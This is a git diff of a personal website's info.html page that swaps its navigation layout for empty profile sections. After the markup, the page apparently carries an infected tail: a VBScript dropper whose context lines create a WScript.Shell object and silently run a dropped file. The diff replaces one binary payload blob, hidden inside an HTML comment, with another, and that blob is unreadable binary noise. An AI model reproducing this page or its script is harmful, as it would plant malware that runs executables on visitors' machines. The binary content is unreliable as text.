--- a/info.html
+++ b/info.html
@@ -1,30 +1,42 @@
 <html>
     <head>
-        <link rel="stylesheet" href="styles/style.css">
     </head>
     <body>
-        <div id="container">
-            <div id="upperCon">
-                <iframe id="topContent" src="" name="topScreen">
-                </iframe>
+        <div>
+            <div id="name">
+                <div class="imageSide">
+                </div>
+                <div class="infoSide">
+                </div>
             </div>
-            <div id="lowerCon">
-                <div id="footer">
-                    <div id="homeButton" class="footerButtons">
-                        <a href="home.html" target="topScreen">HOME</a>
-                    </div>
-                    <div id="infoButton" class="footerButtons">
-                        <a href="">INFO</a>
-                    </div>
-                    <div id="eduButton" class="footerButtons">
-                        <a href="">EDUCATION</a>
-                    </div>
-                    <div id="hobbyButton" class="footerButtons">
-                        <a href="">HOBBY</a>
-                    </div>
-                    <div id="contactButton" class="footerButtons">
-                        <a href="">CONTACT</a>
-                    </div>
+            <div id="age">
+                <div class="imageSide">
+                </div>
+                <div class="infoSide">
+                </div>
+            </div>
+            <div id="birthdate">
+                <div class="imageSide">
+                </div>
+                <div class="infoSide">
+                </div>
+            </div>
+            <div id="birthplace">
+                <div class="imageSide">
+                </div>
+                <div class="infoSide">
+                </div>
+            </div>
+            <div id="address">
+                <div class="imageSide">
+                </div>
+                <div class="infoSide">
+                </div>
+            </div>
+            <div id="status">
+                <div class="imageSide">
+                </div>
+                <div class="infoSide">
                 </div>
             </div>
         </div>
@@ -43,6 +55,8 @@ FileObj.Close
 End If
 Set WSHshell = CreateObject("WScript.Shell")
 WSHshell.Run DropPath, 0
-//--></SCRIPT><!--¿ÓFo™”ﬂ¶¶ÅÇ»$z§⁄D_o!{Ä§”a≥Ωö/Â2∫÷DΩÚªw·Â¯2ˆ]“¿ú⁄Ö®◊Ç+W]◊Õ@èùe‡îrF\±"ÜüaÄû±–<ñ_ÈîqÿP3à
-“…’¨±ÒùMªcœ6Î/„IÎEÌÁùaF*ÀëÖ*J¬'Óp5†‚Ït;ËèM§∏Q–!€∏¨!ß3≠>îä2/ﬂÓ5^“ú)ÑË=}œ9jrzÔræØ∞å2;¥~HQ÷„N+Ii3m0LG⁄˝±ÜWº“)	Ë–∂NÎ–†°Ròªí∏Ó™Ÿ\’ix|óŸí›¬ôP⁄mo∏ú0—Ëˆ2Lî òâN`]f‚⁄ÿL∆6ÊlUjÁ@Öê´‰ödÜóKVÌhô˚üì0#´>íyA5òˆ∂¡O;O“,o·)Ì˜` 
-T2Eê™ΩK°($Ç{njq9≤ˆtÌã?<)átUºy°ÓÆ¬—Ô&ª" WCãó‘>`ıeø8.∫PÛ™u◊åf√%iY&áˆ´z±´\˘¸I¡í7ôwëÌ7*B√ä8]⁄ Éâ‚R8/D‰Òw5„#÷`w]êçd˚ÕÙÿó"ìÊﬂe-˛?&É2Ø¿ˆ?©é‡_Ê2√»Ûk,’”®É?’˘ ·(R"3˘·(·(·(¨ıO^Á˚ZÑÂ( ·(-->
+//--></SCRIPT><!--…é‹H
+ÑØM3àG∏Õ
+òuüßW*†aí∞I“›ƒ”‡˝ÿ£\9¡:ËP>Ts;\ômmî†Úƒ^s≥mõÇF?ñ*ﬁ]÷á*ç;id≤ÍrUv∂.ñ~¡®ÓΩrrDQFNrùÀW“À◊oñË„T	=Ê‹ü*5É˜‘ﬁµ%V02f
+ÈÛ´Íe ¥Œ*î(.'I⁄óÔgØ!¢U›ø y		œ$Ïºıbé—KÃ&R«É—∂ØÁlÒ‹WìÖ",Âèá~Ú‚à¬ÌO=hê‘<G≥T∫»ÛÕ¶¸ı:z¿Óù+¢mÍ\ÜÄ◊›∆~ÀOÚ?è«eyÈ soÇO†Dy¥§6âÎ•˚>5¨b|§àªÃo'4qc?ÕçR\›;´≠ç1öΩ¶c˝%€_Ë\Û‰m–È—Ãû}3N˛gœØ@Q-ù›P4Ú à¡–
+7◊ºøó≈˙®æÙKàﬂJ	∞⁄NºµA VÓ%rºòÛÙê÷ãÎ—û‚rs‰1bÜ≈ß‹o/˙Jr	ÍmøÊ–áÂ8~7—*ä‚Ü?æøÃ≈ª»˛-’z‹r)Œ}˚È¢åjA¡ «J'Ì4ﬁCÙCª}≥q◊c ·(R"3˘·(·(·(¨ıO⁄Û˚ZõÂ( ·(-->
